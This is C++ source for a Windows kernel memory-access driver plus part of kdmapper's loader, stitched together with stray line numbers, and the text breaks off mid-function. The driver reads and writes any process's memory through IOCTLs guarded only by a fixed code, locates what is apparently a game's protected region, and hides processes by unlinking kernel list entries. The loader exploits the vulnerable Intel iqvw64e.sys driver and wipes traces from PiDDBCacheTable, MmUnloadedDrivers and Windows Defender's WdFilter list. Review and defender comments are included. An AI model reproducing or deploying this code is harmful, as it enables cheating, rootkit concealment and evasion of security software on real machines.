#define BA_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec36, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // base address
#define GR_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec37, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // get guarded region
#define HF_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec38, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // TODO
// NOTE(review): this is a compile-time constant compared against a field of
// the request. It is not authentication: any process that can open the device
// and supplies the same value passes the check.
#define SECURITY_CODE 0x94c9e4bc3 // security code that prevents unauthorized access

// PMASK example '0xFFFFFFFFFFFFFF00'
// NOTE(review): the expression below evaluates to 0xFFFFFF000 (bits 12-35),
// which does not match the example value in the comment above.
static const UINT64 PMASK = (~0xfull << 8) & 0xfffffffffull;

// Request structures
typedef struct _PRW {
	// security code
	UINT64 SecurityCode;

	// actual data
	UINT32 ProcessID;
	UINT64 Address;
	UINT64 Buffer;
	SIZE_T Size;
	SIZE_T ReturnSize;

	BOOLEAN Type;

	// variable and pointer declarations
} physical_rw, * p_physical_rw;

typedef struct _VRW {
	// security code
	UINT64 SecurityCode;

	// actual data
	HANDLE ProcessHandle;
	PVOID Address;
	PVOID Buffer;
	SIZE_T Size;
	SIZE_T return_size;

	BOOLEAN Type;

	// variable and pointer declarations
} virtual_rw, * p_virtual_rw;

typedef struct _BA {
	// security code
	UINT64 SecurityCode;

	// actual data
	INT32 process_id;
ULONGLONG* Address; // (out)

	// variable and pointer declarations
} base_address, * p_base_address;

typedef struct _GR {
	// security code
	UINT64 SecurityCode;

	// actual data
	ULONGLONG* Address; // (out)

	// variable and pointer declarations
} guarded_region, * p_guarded_region;

typedef struct _hf {
	// security code
	UINT64 security_code;

	// actual data
	INT32 process_id;

	// variable and pointer declarations
} hide_file, * p_hide_file;

// Undocumented Win32 API definitions
typedef struct _SYSTEM_BIGPOOL_ENTRY {
	PVOID VirtualAddress;
	ULONG_PTR NonPaged : 1;
	ULONG_PTR SizeInBytes;
	UCHAR Tag[4];
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;

typedef struct _SYSTEM_BIGPOOL_INFORMATION {
	ULONG Count;
	SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
	SystemBigPoolInformation = 0x42,
} SYSTEM_INFORMATION_CLASS;

extern "C" {
	NTKERNELAPI NTSTATUS IoCreateDriver(
		PUNICODE_STRING DriverName,
		PDRIVER_INITIALIZE InitializationFunction
	);

	NTKERNELAPI NTSTATUS MmCopyVirtualMemory(
		PEPROCESS SourceProcess,
		PVOID SourceAddress,
		PEPROCESS TargetProcess,
		PVOID TargetAddress,
		SIZE_T BufferSize,
		KPROCESSOR_MODE PreviousMode,
		PSIZE_T ReturnSize
	);

	PVOID NTAPI PsGetProcessSectionBaseAddress(
		PEPROCESS Process
	);

	NTSTATUS NTAPI ZwQuerySystemInformation(
		SYSTEM_INFORMATION_CLASS SystemInformationClass,
		PVOID SystemInformation,
		ULONG SystemInformationLength,
		PULONG ReturnLength
	);
}

namespace driver_functions {
	// begin (Physical Functions)
	// Copies `size` bytes from physical address `Address` into `buffer` with
	// MmCopyMemory(MM_COPY_MEMORY_PHYSICAL). `buffer` is used as given; this
	// function does not validate it.
	NTSTATUS read_physical(PVOID Address, PVOID buffer, SIZE_T size, SIZE_T* bytes_read) {
		MM_COPY_ADDRESS readable = { 0 };
		readable.PhysicalAddress.QuadPart = (LONGLONG)Address;

		return MmCopyMemory(buffer, readable, size, MM_COPY_MEMORY_PHYSICAL, bytes_read);
	}

	// Maps `size` bytes at physical address `Address` with MmMapIoSpaceEx and
	// copies `buffer` into the mapping. Reports `size` through bytes_read.
	// Neither `Address` nor `buffer` is validated beyond the null check.
	NTSTATUS write_physical(PVOID Address, PVOID buffer, SIZE_T size, SIZE_T* bytes_read) {
		if (!Address) return STATUS_UNSUCCESSFUL;

		PHYSICAL_ADDRESS writable = { 0 };
		writable.QuadPart = LONGLONG(Address);

		PVOID mapped_memory = MmMapIoSpaceEx(writable, size, PAGE_READWRITE);
		if (!mapped_memory) return STATUS_UNSUCCESSFUL;

		memcpy(mapped_memory, buffer, size);
		*bytes_read = size;

		MmUnmapIoSpace(mapped_memory, size);

		return STATUS_SUCCESS;
	}
	// end
}

namespace utility_functions {
	// Get the process's CR3 (page table base).
	// Reads a pointer-sized value at offset 0x28 of the process object and,
	// when that is zero, at the offset returned by get_windows_version().
	// Both offsets are hard-coded per build; on a build they do not match,
	// the value read is unrelated data.
	UINT64 get_process_cr3(PEPROCESS process) {
		PUCHAR process_byte = (PUCHAR)process;
		ULONG_PTR process_directory_base = *(PULONG_PTR)(process_byte + 0x28);

		if (process_directory_base == 0) {
			INT32 directory_table_base = get_windows_version();

			ULONG_PTR process_directory_table_base = *(PULONG_PTR)(process_byte + directory_table_base);
			return process_directory_table_base;
		}

		return process_directory_base;
	}

	// Walks the four paging levels by reading physical memory and returns the
	// physical address for virtual_address, or 0 when an entry's present bit
	// is clear. The status returned by read_physical is not checked at any
	// level; only the value read is tested.
	UINT64 translate_virtual_address(UINT64 directory_table_base, UINT64 virtual_address) {
		directory_table_base &= ~0xf; // align the directory table base

		UINT64 page_offset = virtual_address & ~(~0ul << 12); // 12 = size of the page offset

		UINT64 pte = ((virtual_address >> 12) & (0x1ffll)); // 'page table entry'
		UINT64 pt = ((virtual_address >> 21) & (0x1ffll)); // 'page table'
		UINT64 pd = ((virtual_address >> 30) & (0x1ffll)); // 'page directory'
		UINT64 pdp = ((virtual_address >> 39) & (0x1ffll)); // 'page directory pointer'

		SIZE_T buffer = 0;

		UINT64 _pdp = 0;
		driver_functions::read_physical(PVOID(directory_table_base + 8 * pdp), &_pdp, sizeof(_pdp), &buffer);
		if (~_pdp & 1) return 0;

		UINT64 pde = 0;
		driver_functions::read_physical(PVOID((_pdp & PMASK) + 8 * pd), &pde, sizeof(pde), &buffer);
		if (~pde & 1) return 0;

		if (pde & 0x80) // handle 1GB pages
			return (pde & (~0ull << 42 >> 12)) + (virtual_address & ~(~0ull << 30));

		UINT64 _pte = 0;
		driver_functions::read_physical(PVOID((pde & PMASK) + 8 * pt), &_pte, sizeof(_pte), &buffer);
		if (~_pte & 1) return 0;

		if (_pte & 0x80) // handle 2MB pages via the PTE
			return (_pte & PMASK) + (virtual_address & ~(~0ull << 21));

		// normal 4KB page - read the final page table entry
		virtual_address = 0;
		driver_functions::read_physical(PVOID((_pte & PMASK) + 8 * pte), &virtual_address, sizeof(virtual_address), &buffer);
		virtual_address &= PMASK;

		if (!virtual_address)
			return 0;

		return virtual_address + page_offset;
	}
}

// Request handlers. Each one checks the request's security-code field against
// SECURITY_CODE and then acts on addresses and process ids taken from the
// request. No handler probes or captures the pointers it is given, so a
// caller that can reach these handlers controls the kernel-mode reads and
// writes they perform.
namespace io_handlers {
	// Reads or writes (request->Type) at most one page of the target
	// process's memory by translating request->Address to a physical address.
	// NOTE(review): request->Buffer is a caller-supplied 64-bit value used
	// directly as the kernel-mode source/destination pointer.
	// NOTE(review): the status of the read/write is discarded and
	// STATUS_SUCCESS is returned regardless.
	NTSTATUS handle_physical_request(p_physical_rw request) {
		if (request->SecurityCode != SECURITY_CODE) return STATUS_UNSUCCESSFUL;
		if (!request->ProcessID) return STATUS_UNSUCCESSFUL;

		PEPROCESS process = NULL;
		PsLookupProcessByProcessId((HANDLE)request->ProcessID, &process); // look up the process by process ID
		if (!process) return STATUS_UNSUCCESSFUL;

		ULONGLONG process_base = utility_functions::get_process_cr3(process);
		ObDereferenceObject(process);

		SIZE_T this_offset = NULL;
		SIZE_T total_size = request->Size;

		// translate the virtual address to a physical address using the process's CR3
		UINT64 physical_address = utility_functions::translate_virtual_address(process_base, (ULONG64)request->Address + this_offset);
		if (!physical_address)
			return STATUS_UNSUCCESSFUL;

		// compute the final read/write size so that it does not cross a page boundary
		ULONG64 final_size = (
			((PAGE_SIZE - (physical_address & 0xFFF)) < (SIZE_T)total_size) ?
			(PAGE_SIZE - (physical_address & 0xFFF)) : (SIZE_T)total_size
		);

		if (request->Type) // if Type is 'true', write instead
			driver_functions::write_physical(PVOID(physical_address), (PVOID)((ULONG64)request->Buffer + this_offset), final_size, &request->ReturnSize);
		else
			driver_functions::read_physical(PVOID(physical_address), (PVOID)((ULONG64)request->Buffer + this_offset), final_size, &request->ReturnSize);

		return STATUS_SUCCESS;
	}

	// Writes the image base of process request->process_id to the address in
	// request->Address.
	// NOTE(review): request->Address is written with RtlCopyMemory without
	// being probed, and the early return on a zero image base skips
	// ObDereferenceObject, leaving a reference on the process object.
	NTSTATUS handle_base_address_request(p_base_address request) {
		if (request->SecurityCode != SECURITY_CODE) return STATUS_UNSUCCESSFUL;
		if (!request->process_id) return STATUS_UNSUCCESSFUL;

		PEPROCESS process = NULL;
		NTSTATUS status = PsLookupProcessByProcessId((HANDLE)request->process_id, &process);

		if (!NT_SUCCESS(status))
			return status;


		// get the base address of the process image (where its executable is loaded in memory)
		ULONGLONG image_base = (ULONGLONG)PsGetProcessSectionBaseAddress(process);
		if (!image_base) return STATUS_UNSUCCESSFUL;

		// copy the image base into the 'Address' field of the request structure
		RtlCopyMemory(request->Address, &image_base, sizeof(image_base));
		ObDereferenceObject(process);

		return STATUS_SUCCESS;
	}

	// Queries the big-pool table and looks for a non-paged allocation of
	// 0x200000 bytes tagged "TnoC"; on a match its address is copied to the
	// address in request->Address.
	// NOTE(review): request->Address is written without being probed; the
	// matching path returns without ExFreePool(pool_info); the result of
	// ExAllocatePool is not checked before the second query; and
	// STATUS_SUCCESS is also returned when nothing matched.
	NTSTATUS get_gaurded_region(p_guarded_region request) {
		if (request->SecurityCode != SECURITY_CODE) return STATUS_UNSUCCESSFUL;

		ULONG info_size = 0;
		NTSTATUS status = ZwQuerySystemInformation(SystemBigPoolInformation, &info_size, 0, &info_size);

		if (!NT_SUCCESS(status))
			return status;

		// allocate memory for the system pool information
		PSYSTEM_BIGPOOL_INFORMATION pool_info = 0;
		while (status == STATUS_INFO_LENGTH_MISMATCH) {
			if (pool_info) ExFreePool(pool_info);
			pool_info = (PSYSTEM_BIGPOOL_INFORMATION)ExAllocatePool(NonPagedPool, info_size);
			status = ZwQuerySystemInformation(SystemBigPoolInformation, pool_info, info_size, &info_size);
		}

		// iterate over the pool entries
		if (pool_info) {
			for (unsigned int i = 0; i < pool_info->Count; i++) {
				SYSTEM_BIGPOOL_ENTRY* entry = &pool_info->AllocatedInfo[i];
				PVOID virtual_address;
				virtual_address = (PVOID)((uintptr_t)entry->VirtualAddress & ~1ull);
				SIZE_T size_bytes = entry->SizeInBytes;
				BOOLEAN is_non_paged = entry->NonPaged;

				// check for non-paged, a specific size and the tag
				if (entry->NonPaged && entry->SizeInBytes == 0x200000) {
					UCHAR expected_tag[] = "TnoC"; // the tag should be a string, not an unsigned long
					if (memcmp(entry->Tag, expected_tag, sizeof(expected_tag)) == 0) {
						RtlCopyMemory((void*)request->Address, &entry->VirtualAddress, sizeof(entry->VirtualAddress));
						return STATUS_SUCCESS;
					}
				}
			}

			ExFreePool(pool_info);
		}

		return STATUS_SUCCESS;
	}

	// Unlinks the LIST_ENTRY found at offset 0x448 of the process object
	// (named active_process_links here) from its doubly linked list, which
	// removes the process from walks of that list.
	//
	// Defender note: this is direct kernel object manipulation. A process
	// removed this way is missing from list-based enumeration but its kernel
	// objects still exist, so comparing a list walk with an independent view
	// (for example a scan for process objects in memory) exposes the
	// discrepancy.
	// NOTE(review): the offset is hard-coded for one build, the list is
	// edited without any lock, and the reference taken by
	// PsLookupProcessByProcessId is never released; on a build where the
	// offset differs this writes to unrelated kernel memory.
	NTSTATUS handle_hide_file(p_hide_file request) {
		if (request->security_code != SECURITY_CODE) return STATUS_UNSUCCESSFUL;
		if (!request->process_id) return STATUS_UNSUCCESSFUL;

		PEPROCESS process = NULL;
		NTSTATUS status = PsLookupProcessByProcessId((HANDLE)request->process_id, &process);

		if (!NT_SUCCESS(status))
			return status;

		PLIST_ENTRY active_process_links = ((PLIST_ENTRY)((PCHAR)process + 0x448));
		active_process_links->Blink->Flink = active_process_links->Flink;
		active_process_links->Flink->Blink = active_process_links->Blink;

		return STATUS_SUCCESS;
	}
}

namespace major_functions {
	// Default dispatcher for MJ_CREATE and MJ_CLOSE.
	// NOTE(review): irp->IoStatus.Status is read after IoCompleteRequest, when
	// the IRP may already have been freed, and the status is never set here.
	// No check on who opens the device is visible in this function.
	NTSTATUS dispatcher(PDEVICE_OBJECT device_object, PIRP irp) {
		UNREFERENCED_PARAMETER(device_object);

		IoCompleteRequest(irp, IO_NO_INCREMENT);

		return irp->IoStatus.Status;
	}

	// Main I/O handler for our virtual/physical/base-address/mouse requests
	NTSTATUS io_controller(PDEVICE_OBJECT device_object, PIRP irp) {
		UNREFERENCED_PARAMETER(device_object);

		if (KeGetCurrentIrql() != PASSIVE_LEVEL) { // crash fix
| irp->IoStatus.Status = STATUS_UNSUCCESSFUL; 349 | irp->IoStatus.Information = 0; 350 | IoCompleteRequest(irp, IO_NO_INCREMENT); 351 | return STATUS_UNSUCCESSFUL; 352 | } 353 | 354 | NTSTATUS status = STATUS_UNSUCCESSFUL; 355 | ULONG bytes = {}; 356 | 357 | PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(irp); 358 | ULONG code = stack->Parameters.DeviceIoControl.IoControlCode; 359 | ULONG size = stack->Parameters.DeviceIoControl.InputBufferLength; 360 | 361 | // 用于虚拟函数 362 | static PEPROCESS virtual_target_process = nullptr; 363 | 364 | if (code == PRW_CODE) { 365 | if (size == sizeof(_PRW)) { 366 | p_physical_rw request = (p_physical_rw)(irp->AssociatedIrp.SystemBuffer); 367 | 368 | status = io_handlers::handle_physical_request(request); 369 | bytes = sizeof(_PRW); 370 | } 371 | else { 372 | status = STATUS_INFO_LENGTH_MISMATCH; 373 | bytes = 0; 374 | } 375 | } 376 | else if (code == VRW_ATTACH_CODE) { 377 | if (size == sizeof(_VRW)) { 378 | p_virtual_rw request = (p_virtual_rw)(irp->AssociatedIrp.SystemBuffer); 379 | 380 | status = PsLookupProcessByProcessId(request->ProcessHandle, &virtual_target_process); 381 | bytes = sizeof(_VRW); 382 | } 383 | else { 384 | status = STATUS_INFO_LENGTH_MISMATCH; 385 | bytes = 0; 386 | } 387 | } 388 | else if (code == VRW_CODE) { 389 | if (size == sizeof(_VRW)) { 390 | p_virtual_rw request = (p_virtual_rw)(irp->AssociatedIrp.SystemBuffer); 391 | 392 | if (request->Type) { 393 | if (virtual_target_process != nullptr) 394 | status = MmCopyVirtualMemory(PsGetCurrentProcess(), request->Buffer, virtual_target_process, request->Address, request->Size, KernelMode, &request->return_size); 395 | } 396 | else { 397 | if (virtual_target_process != nullptr) 398 | status = MmCopyVirtualMemory(virtual_target_process, request->Address, PsGetCurrentProcess(), request->Buffer, request->Size, KernelMode, &request->return_size); 399 | } 400 | 401 | bytes = sizeof(_VRW); 402 | } 403 | else { 404 | status = STATUS_INFO_LENGTH_MISMATCH; 405 
| bytes = 0; 406 | } 407 | } 408 | else if (code == BA_CODE) { 409 | if (size == sizeof(_BA)) { 410 | p_base_address request = (p_base_address)(irp->AssociatedIrp.SystemBuffer); 411 | 412 | status = io_handlers::handle_base_address_request(request); 413 | bytes = sizeof(_BA); 414 | } 415 | else { 416 | status = STATUS_INFO_LENGTH_MISMATCH; 417 | bytes = 0; 418 | } 419 | } 420 | else if (code == GR_CODE) { 421 | if (size == sizeof(_GR)) { 422 | p_guarded_region request = (p_guarded_region)(irp->AssociatedIrp.SystemBuffer); 423 | 424 | status = io_handlers::get_gaurded_region(request); 425 | bytes = sizeof(_GR); 426 | } 427 | else { 428 | status = STATUS_INFO_LENGTH_MISMATCH; 429 | bytes = 0; 430 | } 431 | } 432 | else if (code == HF_CODE) { 433 | if (size == sizeof(_hf)) { 434 | p_hide_file request = (p_hide_file)(irp->AssociatedIrp.SystemBuffer); 435 | 436 | status = io_handlers::handle_hide_file(request); 437 | bytes = sizeof(_hf); 438 | } 439 | else { 440 | status = STATUS_INFO_LENGTH_MISMATCH; 441 | bytes = 0; 442 | } 443 | } 444 | else { 445 | status = STATUS_INVALID_DEVICE_REQUEST; 446 | bytes = 0; 447 | } 448 | 449 | irp->IoStatus.Status = status; 450 | irp->IoStatus.Information = bytes; 451 | IoCompleteRequest(irp, IO_NO_INCREMENT); 452 | 453 | return status; 454 | } 455 | } 456 | -------------------------------------------------------------------------------- /kdmapper/intel_driver.cpp: -------------------------------------------------------------------------------- 1 | #include "intel_driver.hpp" 2 | #include 3 | #include 4 | #include 5 | 6 | #include "utils.hpp" 7 | #include "intel_driver_resource.hpp" 8 | #include "service.hpp" 9 | #include "nt.hpp" 10 | 11 | #ifdef PDB_OFFSETS 12 | #include "KDSymbolsHandler.h" 13 | #endif 14 | 15 | /** 16 | Command structures 17 | */ 18 | typedef struct _COPY_MEMORY_BUFFER_INFO 19 | { 20 | uint64_t case_number; 21 | uint64_t reserved; 22 | uint64_t source; 23 | uint64_t destination; 24 | uint64_t length; 25 | 
}COPY_MEMORY_BUFFER_INFO, * PCOPY_MEMORY_BUFFER_INFO; 26 | 27 | typedef struct _FILL_MEMORY_BUFFER_INFO 28 | { 29 | uint64_t case_number; 30 | uint64_t reserved1; 31 | uint32_t value; 32 | uint32_t reserved2; 33 | uint64_t destination; 34 | uint64_t length; 35 | }FILL_MEMORY_BUFFER_INFO, * PFILL_MEMORY_BUFFER_INFO; 36 | 37 | typedef struct _GET_PHYS_ADDRESS_BUFFER_INFO 38 | { 39 | uint64_t case_number; 40 | uint64_t reserved; 41 | uint64_t return_physical_address; 42 | uint64_t address_to_translate; 43 | }GET_PHYS_ADDRESS_BUFFER_INFO, * PGET_PHYS_ADDRESS_BUFFER_INFO; 44 | 45 | typedef struct _MAP_IO_SPACE_BUFFER_INFO 46 | { 47 | uint64_t case_number; 48 | uint64_t reserved; 49 | uint64_t return_value; 50 | uint64_t return_virtual_address; 51 | uint64_t physical_address_to_map; 52 | uint32_t size; 53 | }MAP_IO_SPACE_BUFFER_INFO, * PMAP_IO_SPACE_BUFFER_INFO; 54 | 55 | typedef struct _UNMAP_IO_SPACE_BUFFER_INFO 56 | { 57 | uint64_t case_number; 58 | uint64_t reserved1; 59 | uint64_t reserved2; 60 | uint64_t virt_address; 61 | uint64_t reserved3; 62 | uint32_t number_of_bytes; 63 | }UNMAP_IO_SPACE_BUFFER_INFO, * PUNMAP_IO_SPACE_BUFFER_INFO; 64 | 65 | // End Command structures 66 | 67 | ULONG64 intel_driver::ntoskrnlAddr = 0; 68 | std::string cachedDriverName = ""; 69 | 70 | std::wstring intel_driver::GetDriverNameW() { 71 | if (cachedDriverName.empty()) { 72 | //Create a random name 73 | char buffer[100]{}; 74 | static const char alphanum[] = 75 | "abcdefghijklmnopqrstuvwxyz" 76 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 77 | int len = rand() % 20 + 10; 78 | for (int i = 0; i < len; ++i) 79 | buffer[i] = alphanum[rand() % (sizeof(alphanum) - 1)]; 80 | cachedDriverName = buffer; 81 | } 82 | 83 | std::wstring name(cachedDriverName.begin(), cachedDriverName.end()); 84 | return name; 85 | } 86 | 87 | std::wstring intel_driver::GetDriverPath() { 88 | std::wstring temp = utils::GetFullTempPath(); 89 | if (temp.empty()) { 90 | return L""; 91 | } 92 | return temp + L"\\" + 
GetDriverNameW(); 93 | } 94 | 95 | bool intel_driver::IsRunning() { 96 | const HANDLE file_handle = CreateFileW(L"\\\\.\\Nal", FILE_ANY_ACCESS, 0, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr); 97 | if (file_handle != nullptr && file_handle != INVALID_HANDLE_VALUE) 98 | { 99 | CloseHandle(file_handle); 100 | return true; 101 | } 102 | return false; 103 | } 104 | 105 | //get Se debug privilege 106 | bool intel_driver::AcquireDebugPrivilege() { 107 | 108 | HMODULE ntdll = GetModuleHandleA("ntdll.dll"); 109 | if (ntdll == NULL) { 110 | return false; 111 | } 112 | 113 | ULONG SE_DEBUG_PRIVILEGE = 20UL; 114 | BOOLEAN SeDebugWasEnabled; 115 | NTSTATUS Status = nt::RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &SeDebugWasEnabled); 116 | if (!NT_SUCCESS(Status)) { 117 | Log("[-] Failed to acquire SE_DEBUG_PRIVILEGE" << std::endl); 118 | return false; 119 | } 120 | 121 | return true; 122 | } 123 | 124 | HANDLE intel_driver::Load() { 125 | srand((unsigned)time(NULL) * GetCurrentThreadId()); 126 | 127 | //from https://github.com/ShoaShekelbergstein/kdmapper as some Drivers takes same device name 128 | if (intel_driver::IsRunning()) { 129 | Log(L"[-] \\Device\\Nal is already in use." << std::endl); 130 | Log(L"[-] This means that there is a intel driver already loaded or another instance of kdmapper is running or kdmapper crashed and didn't unload the previous driver." << std::endl); 131 | Log(L"[-] If you are sure that there is no other instance of kdmapper running, you can try to restart your computer to fix this issue." << std::endl); 132 | Log(L"[-] If the problem persists, you can try to unload the intel driver manually (If the driver was loaded with kdmapper will have a random name and will be located in %temp%), if not, the driver name is iqvw64e.sys." 
<< std::endl); 133 | return INVALID_HANDLE_VALUE; 134 | } 135 | 136 | Log(L"[<] Loading vulnerable driver, Name: " << GetDriverNameW() << std::endl); 137 | 138 | std::wstring driver_path = GetDriverPath(); 139 | if (driver_path.empty()) { 140 | Log(L"[-] Can't find TEMP folder" << std::endl); 141 | return INVALID_HANDLE_VALUE; 142 | } 143 | 144 | _wremove(driver_path.c_str()); 145 | 146 | if (!utils::CreateFileFromMemory(driver_path, reinterpret_cast(intel_driver_resource::driver), sizeof(intel_driver_resource::driver))) { 147 | Log(L"[-] Failed to create vulnerable driver file" << std::endl); 148 | return INVALID_HANDLE_VALUE; 149 | } 150 | 151 | if (!AcquireDebugPrivilege()) { 152 | Log(L"[-] Failed to acquire SeDebugPrivilege" << std::endl); 153 | _wremove(driver_path.c_str()); 154 | return INVALID_HANDLE_VALUE; 155 | } 156 | 157 | if (!service::RegisterAndStart(driver_path, GetDriverNameW())) { 158 | Log(L"[-] Failed to register and start service for the vulnerable driver" << std::endl); 159 | _wremove(driver_path.c_str()); 160 | return INVALID_HANDLE_VALUE; 161 | } 162 | 163 | HANDLE result = CreateFileW(L"\\\\.\\Nal", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 164 | 165 | if (!result || result == INVALID_HANDLE_VALUE) 166 | { 167 | Log(L"[-] Failed to load driver iqvw64e.sys" << std::endl); 168 | intel_driver::Unload(result); 169 | return INVALID_HANDLE_VALUE; 170 | } 171 | 172 | ntoskrnlAddr = utils::GetKernelModuleAddress("ntoskrnl.exe"); 173 | if (ntoskrnlAddr == 0) { 174 | Log(L"[-] Failed to get ntoskrnl.exe" << std::endl); 175 | intel_driver::Unload(result); 176 | return INVALID_HANDLE_VALUE; 177 | } 178 | 179 | //check MZ ntoskrnl.exe 180 | IMAGE_DOS_HEADER dosHeader = { 0 }; 181 | if (!intel_driver::ReadMemory(result, intel_driver::ntoskrnlAddr, &dosHeader, sizeof(IMAGE_DOS_HEADER)) || dosHeader.e_magic != IMAGE_DOS_SIGNATURE) { 182 | Log(L"[-] Can't exploit intel driver, is there any antivirus or anticheat 
running?" << std::endl); 183 | intel_driver::Unload(result); 184 | return INVALID_HANDLE_VALUE; 185 | } 186 | 187 | if (!intel_driver::ClearPiDDBCacheTable(result)) { 188 | Log(L"[-] Failed to ClearPiDDBCacheTable" << std::endl); 189 | intel_driver::Unload(result); 190 | return INVALID_HANDLE_VALUE; 191 | } 192 | 193 | if (!intel_driver::ClearKernelHashBucketList(result)) { 194 | Log(L"[-] Failed to ClearKernelHashBucketList" << std::endl); 195 | intel_driver::Unload(result); 196 | return INVALID_HANDLE_VALUE; 197 | } 198 | 199 | if (!intel_driver::ClearMmUnloadedDrivers(result)) { 200 | Log(L"[!] Failed to ClearMmUnloadedDrivers" << std::endl); 201 | intel_driver::Unload(result); 202 | return INVALID_HANDLE_VALUE; 203 | } 204 | 205 | if (!intel_driver::ClearWdFilterDriverList(result)) { 206 | Log("[!] Failed to ClearWdFilterDriverList" << std::endl); 207 | intel_driver::Unload(result); 208 | return INVALID_HANDLE_VALUE; 209 | } 210 | 211 | return result; 212 | } 213 | 214 | bool intel_driver::ClearWdFilterDriverList(HANDLE device_handle) { 215 | 216 | auto WdFilter = utils::GetKernelModuleAddress("WdFilter.sys"); 217 | if (!WdFilter) { 218 | Log("[+] WdFilter.sys not loaded, clear skipped" << std::endl); 219 | return true; 220 | } 221 | 222 | //#ifdef PDB_OFFSETS 223 | // uintptr_t MpBmDocOpenRules = KDSymbolsHandler::GetInstance()->GetOffset(L"MpBmDocOpenRules"); 224 | // if (!MpBmDocOpenRules) 225 | // { 226 | // Log("[-] Failed To Get MpBmDocOpenRules." 
<< std::endl); 227 | // return false; 228 | // } 229 | // MpBmDocOpenRules += WdFilter; 230 | // 231 | // uintptr_t RuntimeDriversList_Head = MpBmDocOpenRules + 0x70; 232 | // uintptr_t RuntimeDriversCount = MpBmDocOpenRules + 0x60; 233 | // uintptr_t RuntimeDriversArray = MpBmDocOpenRules + 0x68; 234 | // ReadMemory(device_handle, RuntimeDriversArray, &RuntimeDriversArray, sizeof(uintptr_t)); 235 | // 236 | // uintptr_t MpFreeDriverInfoEx = KDSymbolsHandler::GetInstance()->GetOffset(L"MpFreeDriverInfoEx"); 237 | // if (!MpFreeDriverInfoEx) 238 | // { 239 | // Log("[-] Failed To Get MpFreeDriverInfoEx." << std::endl); 240 | // return false; 241 | // } 242 | // MpFreeDriverInfoEx += WdFilter; 243 | //#else 244 | auto RuntimeDriversList = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x48\x8B\x0D\x00\x00\x00\x00\xFF\x05", "xxx????xx"); 245 | if (!RuntimeDriversList) { 246 | Log("[!] Failed to find WdFilter RuntimeDriversList" << std::endl); 247 | return false; 248 | } 249 | 250 | auto RuntimeDriversCountRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\xFF\x05\x00\x00\x00\x00\x48\x39\x11", "xx????xxx"); 251 | if (!RuntimeDriversCountRef) { 252 | Log("[!] 
Failed to find WdFilter RuntimeDriversCount" << std::endl); 253 | return false; 254 | } 255 | 256 | // MpCleanupDriverInfo->MpFreeDriverInfoEx 23110 257 | /* 258 | 49 8B C9 mov rcx, r9 ; P 259 | 49 89 50 08 mov [r8+8], rdx 260 | E8 FB F0 FD FF call MpFreeDriverInfoEx 261 | 48 8B 0D FC AA FA FF mov rcx, cs:qword_1C0021BF0 262 | E9 21 FF FF FF jmp loc_1C007701A 263 | */ 264 | auto MpFreeDriverInfoExRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x49\x8B\xC9\x00\x89\x00\x08\xE8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE9", "xxx?x?xx???????????x"); 265 | if (!MpFreeDriverInfoExRef) { 266 | // 24010 267 | /* 268 | 48 89 4A 08 mov [rdx+8], rcx 269 | 49 8B C8 mov rcx, r8 ; P 270 | E8 C3 58 FE FF call sub_1C0065308 271 | 48 8B 0D 44 41 FA FF mov rcx, cs:qword_1C0023B90 272 | E9 39 FF FF FF jmp loc_1C007F98A 273 | */ 274 | MpFreeDriverInfoExRef = FindPatternInSectionAtKernel(device_handle, "PAGE", WdFilter, (PUCHAR)"\x48\x89\x4A\x00\x49\x8b\x00\xE8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE9", "xxx?xx?x???????????x"); 275 | if (!MpFreeDriverInfoExRef) { 276 | Log("[!] 
Failed to find WdFilter MpFreeDriverInfoEx" << std::endl); 277 | return false; 278 | } 279 | else { 280 | Log("[+] Found WdFilter MpFreeDriverInfoEx with second pattern" << std::endl); 281 | } 282 | } 283 | 284 | MpFreeDriverInfoExRef += 0x7; // skip until call instruction 285 | 286 | RuntimeDriversList = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)RuntimeDriversList, 3, 7); 287 | uintptr_t RuntimeDriversList_Head = RuntimeDriversList - 0x8; 288 | uintptr_t RuntimeDriversCount = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)RuntimeDriversCountRef, 2, 6); 289 | uintptr_t RuntimeDriversArray = RuntimeDriversCount + 0x8; 290 | ReadMemory(device_handle, RuntimeDriversArray, &RuntimeDriversArray, sizeof(uintptr_t)); 291 | uintptr_t MpFreeDriverInfoEx = (uintptr_t)ResolveRelativeAddress(device_handle, (PVOID)MpFreeDriverInfoExRef, 1, 5); 292 | //#endif 293 | 294 | auto ReadListEntry = [&](uintptr_t Address) -> LIST_ENTRY* { // Useful lambda to read LIST_ENTRY 295 | LIST_ENTRY* Entry; 296 | if (!ReadMemory(device_handle, Address, &Entry, sizeof(LIST_ENTRY*))) return 0; 297 | return Entry; 298 | }; 299 | 300 | for (LIST_ENTRY* Entry = ReadListEntry(RuntimeDriversList_Head); 301 | Entry != (LIST_ENTRY*)RuntimeDriversList_Head; 302 | Entry = ReadListEntry((uintptr_t)Entry + (offsetof(struct _LIST_ENTRY, Flink)))) 303 | { 304 | UNICODE_STRING Unicode_String; 305 | if (ReadMemory(device_handle, (uintptr_t)Entry + 0x10, &Unicode_String, sizeof(UNICODE_STRING))) { 306 | auto ImageName = std::make_unique((ULONG64)Unicode_String.Length / 2ULL + 1ULL); 307 | if 